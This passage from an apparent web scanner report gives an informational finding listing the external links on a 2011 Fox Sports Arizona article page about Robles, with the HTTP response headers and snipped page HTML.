<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

22.424. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?
http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?
http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?
http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?
http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?
http://advertising.msn.com/msn/
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png
http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/fb/index.asp
http://foxsportsarizona.stats.com/fb/scoreboard.asp
http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions
http://foxsportsarizona.stats.com/fb/totalstandings.asp
http://foxsportsarizona.stats.com/mlb/index.asp
http://foxsportsarizona.stats.com/mlb/scoreboard.asp
http://foxsportsarizona.stats.com/mlb/standings.asp
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans
http://foxsportsarizona.stats.com/nba/index.asp
http://foxsportsarizona.stats.com/nba/scoreboard.asp
http://foxsportsarizona.stats.com/nba/standings.asp
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule
http://foxsportsarizona.stats.com/nhl/index.asp?season=reg
http://foxsportsarizona.stats.com/nhl/scoreboard.asp
http://foxsportsarizona.stats.com/nhl/standings_conference.asp
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule
http://foxsportsarizona.stats.com/wnba/leaders.asp
http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06
http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06
http://foxsportsarizona.stats.com/wnba/scoreboard.asp
http://foxsportsarizona.stats.com/wnba/standings.asp
http://foxsportsarizona.stats.com/wnba/stats.asp?team=06
http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/cbk/scores?scheduleDayCode=2011-1-29&region=&tournament=&conference=0
http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
http://msn.foxsports.com/cbk/story/No-21-Georgetown-upsets-eighth-ranked-Villanova-012811
http://msn.foxsports.com/cbk/story/No-9-Syracuse-loses-fourth-game-in-a-row-012911
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911
http://msn.foxsports.com/nascar/story/24-Hours-of-Daytona-beings-Chip-Ganassia-Racing-problems-012911
http://msn.foxsports.com/search
http://msn.foxsports.com/tennis/story/maturity-experience-aid-clijsters-to-first-australian-open-title-012911
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://platform.twitter.com/widgets.js
http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png
http://platformic-common.s3.amazonaws.com/global_images/icons/email.png
http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png
http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png
http://platformic-common.s3.amazonaws.com/global_images/icons/print.png
http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png
http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg
http://realestate.redacted/
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&cg=0&cc=1&ts=noscript
http://specials.redacted/alphabet.aspx
http://thebubble.redacted/
http://tv.redacted/
http://twitter.com/share
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=FOXSP
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.foxsportscarolinas.com/
http://www.foxsportsdetroit.com/
http://www.foxsportsflorida.com/
http://www.foxsportshouston.com/
http://www.foxsportskansascity.com/
http://www.foxsportsmidwest.com/
http://www.foxsportsnorth.com/
http://www.foxsportsohio.com/
http://www.foxsportssouth.com/
http://www.foxsportssouthwest.com/
http://www.foxsportstennessee.com/
http://www.foxsportswest.com/
http://www.foxsportswisconsin.com/
http://www.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.myhomeredacted/
http://www.nesn.com/
http://www.razorgator.com/tickets/sports/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:35 GMT
Date: Sat, 29 Jan 2011 23:53:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.redacted/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Arizona</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/dbacks' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles' target = '_blank' >Team stats</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/mlb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/mlb/index.asp' target = '_blank' >MLB leaders</a>
...[SNIP]...
<a href='/pages/suns' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/nba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nba/index.asp' target = '_blank' >NBA leaders</a>
...[SNIP]...
<a href='/pages/coyotes' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster' target = '_blank' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nhl/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nhl/index.asp?season=reg' target = '_blank' >NHL leaders</a>
...[SNIP]...
<a href='/pages/sundevils' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azwildcats' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azcardinals' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/fb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/fb/index.asp' target = '_blank' >NFL stats</a>
...[SNIP]...
<a href='/pages/mercury' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/wnba/stats.asp?team=06' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/wnba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/wnba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/wnba/leaders.asp' target = '_blank' >WNBA stats</a>
...[SNIP]...
<a href='/pages/nau' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...

<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" type="text/javascript"></script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344370?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_399825">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825^feedID=3698^gt1=39002^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=399825&feedID=3698&gt1=39002&" target=_blank rel="nofollow">
...[SNIP]...
sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('No limits for Robles as next stage beckons') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/common/dynrss/dynrss_3698_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...

<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" type="text/javascript"></script>
